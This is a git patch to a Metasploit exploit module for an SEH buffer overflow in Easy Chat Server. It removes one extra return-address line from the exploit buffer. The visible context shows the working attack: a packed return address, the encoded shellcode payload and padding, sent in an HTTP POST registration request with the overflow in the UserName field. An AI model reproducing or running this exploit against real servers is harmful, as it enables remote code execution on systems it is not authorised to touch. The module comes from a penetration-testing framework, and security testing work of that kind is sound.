From af4eb0fbe3e9b9a12b87587bf2bafe74aa4a0487 Mon Sep 17 00:00:00 2001 From: Mzack9999 Date: Tue, 20 Jun 2017 00:55:18 +0200 Subject: [PATCH] Corrected shellcode --- modules/exploits/windows/http/easychatserver_seh.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/windows/http/easychatserver_seh.rb b/modules/exploits/windows/http/easychatserver_seh.rb index a49c33912c..b6973d7375 100644 --- a/modules/exploits/windows/http/easychatserver_seh.rb +++ b/modules/exploits/windows/http/easychatserver_seh.rb @@ -51,7 +51,6 @@ class MetasploitModule < Msf::Exploit::Remote sploit << [target.ret].pack('V') sploit << payload.encoded sploit << rand_text_alpha_upper(200) - sploit << [target.ret].pack('V') request = "POST /registresult.htm HTTP/1.1\r\n\r\nUserName=#{sploit}&Password=test&Password1=test&Sex=1&Email=x@&Icon=x.gif&Resume=xxxx&cw=1&RoomID=4&RepUserName=admin&submit1=Register" connect